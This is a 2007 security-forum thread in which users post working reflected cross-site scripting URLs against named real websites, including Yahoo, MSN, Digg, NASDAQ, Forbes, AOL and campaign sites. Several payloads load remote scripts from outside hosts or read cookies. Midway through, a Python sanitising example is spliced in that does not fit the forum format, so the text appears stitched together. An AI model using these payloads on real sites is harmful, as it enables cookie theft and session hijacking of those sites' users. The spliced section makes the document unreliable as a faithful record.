Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: Kyran
Date: April 16, 2007 10:17PM

Even easier.
http://www.leapfish.com/domain_name_appraisal.php?url=1337%3Cscript%20src=//ha.ckers.org/s%20/%3E

- Kyran

Re: So it begins
Posted by: trev
Date: April 17, 2007 09:30AM

Kyran, that's Firefox only (and then not even Firefox 3.0 alphas). I gave the other variant because it will work in all browsers.



Edited 1 time(s). Last edit at 04/17/2007 09:31AM by trev.

Re: So it begins
Posted by: Kyran
Date: April 17, 2007 01:34PM

Actually, it works fine in Opera.
And with only a slight edit, it works in IE.
http://www.leapfish.com/domain_name_appraisal.php?url=1337%3Cscript%20defer%20src=//ha.ckers.org/s%20/%3E%3C/script%3E

- Kyran

Re: So it begins
Posted by: trev
Date: April 19, 2007 09:22PM

Self-made XSS on Yahoo (have to click the ad):

[eur.a1.yimg.com]

Originally this was clickTAG=javascript:bfss_doGetURL(...) - that's what they have on Yahoo's main page. Unbelievable...



Edited 4 time(s). Last edit at 04/23/2007 07:14PM by trev.

Re: So it begins
Posted by: digi7al64
Date: April 19, 2007 11:25PM

302 - Firefox only

http://search.news.com/click?sl,news.56.282.1557.0.1.%2522%26gt%3B%26lt%3Bmoo.0,javascript:alert('xss');

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Date: April 20, 2007 06:31AM

You have a typo; it should be http://search.news.com/click?sl,news.56.282.1557.0.1.%2522%26gt%3B%26lt%3Bmoo.0,javascript:alert('xss')%22

Re: So it begins
Date: April 20, 2007 06:21PM

NSFW:
http://www.bankrate.com/brm/searchResults.asp?q=<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,97,119,101,115,111,109,101,97,110,100,114,101,119,46,110,101,116,47,105,109,97,103,101,115,47,99,111,111,107,105,101,115,46,103,105,102,34,62));</script>&btnG=submit&site=my_collection&client=my_collection&output=xml_no_dtd&getfields=*&web=brm&advSearch=0&sort=date%3AD%3AS%3Ad1

NSFW:
http://www.royaltyfreehd.com/catalog/search.jsp?search=<script%20defer%20src="http://www.awesomeandrew.net/fd/stock.js"></script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: Ghozt
Date: April 20, 2007 06:49PM

http://apidoc.digg.com/FindPage?SearchFor=Digg%22style%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29;

Re: So it begins
Posted by: ma1
Date: April 20, 2007 08:15PM

Ghozt Wrote:
-------------------------------------------------------
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22s
> tyle%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%
> 2Fha.ckers.org%2Fxssmoz.xml%23xss%29;
Couldn't make it work on Firefox (where it belongs), not sure why, but this variant did work with IE:

http://apidoc.digg.com/FindPage?SearchFor=Digg%22%20style%3D%22color:%20expression%28document.title%3D%27xss%27%29

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: So it begins
Posted by: [k]
Date: April 21, 2007 09:24AM

ma1 Wrote:
-------------------------------------------------------
> Ghozt Wrote:
> --------------------------------------------------
> -----
> >
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22s
>
> >
> tyle%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%
>
> > 2Fha.ckers.org%2Fxssmoz.xml%23xss%29;
> Couldn't make it work on Firefox (where it
> belongs), not sure why, but this variant did work
> with IE:
>
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22%
> 20style%3D%22color:%20expression%28document.title%
> 3D%27xss%27%29

Not sure what you were trying to do, but this works in IE, FF and Opera:

http://apidoc.digg.com/FindPage?SearchFor=Digg%22%3e%3cscript%3ealert(1)%3c/script%3e%3cinput

Added a dead input tag to hide the maxlength attribute on the search box that gets orphaned on the injection.

Re: So it begins
Posted by: beford
Date: April 22, 2007 01:51AM

> Not sure what you were trying to do, but this
> works in IE, FF and Opera:
>
> http://apidoc.digg.com/FindPage?SearchFor=Digg%22%
> 3e%3cscript%3ealert(1)%3c/script%3e%3cinput
>
> Added a dead input tag to hide the maxlength
> attribute on the search box that gets orphaned on
> the injection.

Looks like apidoc.digg.com is using a WikiLike software from www.pbwiki.com

I'll quote something from their site (http://pbwiki.com/biz.html)
"Most IP theft and security issues happen behind the firewall, where security tends to be lax. We're fanatical about security. "

http://mrlindsay.pbwiki.com/FindPage?SearchFor=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

I've just done what I think is right, and sent them a mail with a link to this thread.

PD: A couple of msn.com XSS

http://photo.be.msn.com/cart/indexnoxml.asp?Mnemonic=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://soittoaanet.fi.msn.com/polytones_intro_prod_categoria.asp?idcateg=980&categ=Iskelm%C3%A4%20%22%3E%3Cscript%20%3Ealert(document.cookie)%3C/script%3E%22
http://photo.be.msn.com/inc/transfertodotnet.asp?moduleto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cwt+x=%22

Re: So it begins
Posted by: ma1
Date: April 22, 2007 05:58AM

[k] Wrote:

> Not sure what you were trying to do
Ghozt tried to include an external script using XBL (Gecko based browsers), I "tried" to run a MS-proprietary CSS JS expression, which was the morphologically most similar translation for IE, i.e. script execution from a CSS inline attribute.
If you didn't notice, it changes the document title but should do as well anything else, I just didn't want to lock your browser with infinite alerts and was too lazy to include a run-once flag check.

It was just for fun, your vector is the most universal and obvious - obviously ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 04/22/2007 06:00AM by ma1.

Re: So it begins
Posted by: [k]
Date: April 22, 2007 08:44AM

Ah right, gotcha. Interesting in some scenarios, could be useful. I like the idea of browser-specific exploits, I just haven't found a direct use for one. I can think of some scenarios, but only in a highly-focussed attack.

Re: So it begins
Posted by: Henaro
Date: April 22, 2007 11:21AM

http://search3.webfeat.org/cgi-bin/WebFeat.dll?Command=Search&noserial=1&format=JS&rtmpl=js&wf_term1=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&wf_field1=wf_keyword&Databases=wf_ebschool%2Cwf_sirsks%2Cwf_sirsdiscover%2Cwf_groveart%2Cwf_kidsinfobits%2Cwf_ebscoxml_mih%2Cwf_ebscoxml_ulh%2Cwf_ebscoxml_f5h%2Cwf_ebscoxml_nfh&wf_all_years=yes

Found this while doing a research paper for lit. W.H. Auden is a punk bitch. I hate poems. :(

"Pessimistic analogy revolving around life."

Re: So it begins
Posted by: pbwiki
Date: April 22, 2007 03:19PM

Thanks for pointing these XSS issues out. We're going to fix those pronto. If you find other security issues, we'd love to hear from you directly. You can email me (David Weekly, the CEO of PBwiki) at david@pbwiki.com to make sure it's brought immediately to my attention.

Thanks for helping us build a more secure product!

-David

Re: So it begins
Posted by: pbwiki
Date: April 22, 2007 03:29PM

The FindPage XSS issue pointed out here is now fixed in production. Please let me know if you find others. :)

Re: So it begins
Date: April 22, 2007 04:30PM

rsnake Wrote:
-------------------------------------------------------
> http://www.nasdaq.com/portfolio/ptform2.asp?site=&
> sitesubtype=&email=%22%3E%3Cscript%3Ealert(%22XSS%
> 22)%3C/script%3E&name=&submit=Submit
Found this one when I saw how bad a certain stock was sucking last night.
http://quotes.nasdaq.com/quote.dll?page=charting&mode=basics&intraday=off&timeframe=1y&charttype=line&splits=off&earnings=off&movingaverage=None&lowerstudy=volume&comparison=off&index=&drilldown=off&symbol="><script>alert(1);</script>&selected=ASS


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Posted by: FR3DC3RV
Date: April 23, 2007 12:43PM

http://www.edirectsoftware.com/search_result.php?search=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Search.x=0&Search.y=0

http://www.min-edu.pt/np3/pesquisa?txt=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0

-------------------------------
http://fr3dc3rv.blogspot.com

Re: So it begins
Posted by: [k]
Date: April 23, 2007 01:22PM

http://fr.rpmfind.net/linux/rpm2html/search.php?query=%22%3e%3Cscript%3Ealert(1)%3C/script%3E

Didn't bother cleaning up. This one triggers twice: once when breaking out of the input and again when it is echoed to the page. It is also written to the title tag.

There are three inputs on the page, all of which have the same vulnerability.

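A defensive counterpart to the three reflection points [k] describes above (title tag, input value attribute, page body), added here as an example and not code from the thread or from rpm2html: the query parameter is decoded the way a browser would send it, escaped identically at every reflection point, and a structural check confirms that the markup's tag and attribute-quote counts do not vary with the input. The URL is copied from the post; the page template and function names are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# URL from the post above; the query string carries "><script>alert(1)</script>
SAMPLE_URL = ('http://fr.rpmfind.net/linux/rpm2html/search.php'
              '?query=%22%3e%3Cscript%3Ealert(1)%3C/script%3E')


def query_param(url, name):
    """Decode one query-string parameter as the server would see it ('' if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(name, [''])[0]


def render_unsafe(query):
    """The bug the post describes (assumed template): raw query reflected into
    the title, the input's value attribute and the body, with no encoding.
    A closing quote and '>' in the query terminate the attribute and the tag."""
    return (f'<html><head><title>Search: {query}</title></head>\n'
            f'<body><form><input type="text" name="query" value="{query}" maxlength="100"></form>\n'
            f'<p>Results for {query}</p></body></html>')


def render_safe(query):
    """Hardened form: HTML-escape once (&, <, >, ", ') and reuse the escaped
    value at all three points. All three are HTML text/attribute contexts, so
    one encoding covers them; a script or URL context would need its own."""
    safe = html.escape(query, quote=True)
    return (f'<html><head><title>Search: {safe}</title></head>\n'
            f'<body><form><input type="text" name="query" value="{safe}" maxlength="100"></form>\n'
            f'<p>Results for {safe}</p></body></html>')


# Structural baseline: the number of '<' and '"' in the page with an empty query.
_BASE_TAGS = render_safe('').count('<')
_BASE_QUOTES = render_safe('').count('"')


def markup_unchanged(page):
    """Check a rendered page introduced no new tags or attribute delimiters.
    Any user input that adds a '<' or '"' to the page has changed its structure."""
    return page.count('<') == _BASE_TAGS and page.count('"') == _BASE_QUOTES


if __name__ == '__main__':
    q = query_param(SAMPLE_URL, 'query')
    print('unsafe page intact:', markup_unchanged(render_unsafe(q)))  # False
    print('safe page intact:  ', markup_unchanged(render_safe(q)))    # True
```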
another ones
Posted by: iota
Date: April 24, 2007 11:19AM


Re: So it begins
Date: April 25, 2007 06:57PM

http://www.mininova.org/search/?search=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.torrentspy.com/search?query=%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E&submit.x=0&submit.y=0
http://thepiratebay.org/brwsearch.php?orderby=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.onlytorrents.com/search/?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

torrents!

Re: So it begins
Posted by: christ1an
Date: April 26, 2007 01:28PM

There are various vulns on forbes...
http://search.forbes.com/search/find?MT=%22%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2Fh4k.in%2Fj.js%3E

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

Re: So it begins
Posted by: thornmaker
Date: April 27, 2007 12:11AM

with search history enabled: http://search.aol.com/aol/search?query=%22%3E%3Cscript%3Ealert%28455%29%3C%2Fscript%3E&safesearch=0&invocationType=adultNC
after following link, perform any other search with the search history still turned on and vector will fire



Edited 1 time(s). Last edit at 04/27/2007 12:17AM by thornmaker.

Re: So it begins
Posted by: Secks
Date: April 29, 2007 04:56PM

http://www.wweshop.com/quickshop.asp?notfound=%3Cscript%3Ealert(document.cookie)%3C/script%3E

It will echo anything you put. No filtering whatsoever.

Re: So it begins
Posted by: thornmaker
Date: April 29, 2007 10:56PM

http://www.joebiden.com/getinformed/opeds?id=%3Cscript%3Ealert(/xss/)%3C/script%3E
https://contribute.hillaryclinton.com/form.html?sc=7%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://my.barackobama.com/page/event/search_results?type=simple&orderby=zip_radius&zip_radius%5b0%5d=90210&zip_radius%5b1%5d=100%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

Re: So it begins
Posted by: [k]
Date: April 30, 2007 11:29AM

http://www.virginmedia.com/results/?q=%22%3e%3cscript%3ealert(1)%3c/script%3e
http://search.orange.co.uk/all?q=%22%3c/title%3e%3E%3cscript%3ealert(1)%3c/script%3etest
http://www.marksandspencer.com/gp/search/202-6542564-3636619?field-keywords=%5c%22;alert(1);//

Re: So it begins
Posted by: rsnake
Date: April 30, 2007 12:38PM

From an anonymous lurker:

https://www.cenzic.com/forms/ec.php?pubid=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

http://www.qualys.com/forms/trials/freescan/matrix/?first=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Submit&lsid=6960&_form_visited=1

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Secks
Date: May 01, 2007 04:35PM

There's a lot more than this, but yeah:

http://www.dnscoop.com/tools/dns/domainwhois.php?query=%3Cplaintext%3E
http://www.dnscoop.com/index.php=%22%3E%3Cscript%3Ealert(1)%3C/script%3E



Edited 1 time(s). Last edit at 05/01/2007 04:36PM by Secks.

Re: So it begins
Posted by: blad3
Date: May 02, 2007 03:32AM

In the light of the recent digg riot against censoring the HD-DVD key, it would be funny to find some XSS on hddvd homepage and insert the number on their own page :P

I didn't manage to find one. Maybe others are more lucky.
http://www.hddvdprg.com/

Re: So it begins
Posted by: trev
Date: May 02, 2007 06:22AM

That should be difficult. Google finds only one dynamic web page there: http://www.hddvdprg.com/cgi/jpn_enq/enq.cgi. And they don't even use JavaScript.
